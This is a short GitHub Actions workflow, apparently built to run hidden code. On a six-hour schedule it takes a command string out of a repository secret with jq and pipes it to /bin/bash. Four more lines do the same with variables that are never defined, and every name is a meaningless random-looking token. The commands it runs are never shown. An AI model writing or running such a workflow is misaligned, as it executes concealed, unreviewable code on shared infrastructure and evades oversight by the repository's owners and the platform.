name: elementcap

on:
  workflow_dispatch:
  schedule:
    - cron: '9 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: elementcap
        env:
          mgn45: ${{ secrets.mgn45 }}
        run: |
          echo $mgn45 | jq -r .jgvbe6336 | /bin/bash
          echo $lnka94255 | jq -r .vuz3448 | /bin/bash
          echo $fpkay1 | jq -r .lx9597 | /bin/bash
          echo $l994 | jq -r .wiqgl941 | /bin/bash
          echo $fvhho34966 | jq -r .ezm110 | /bin/bash

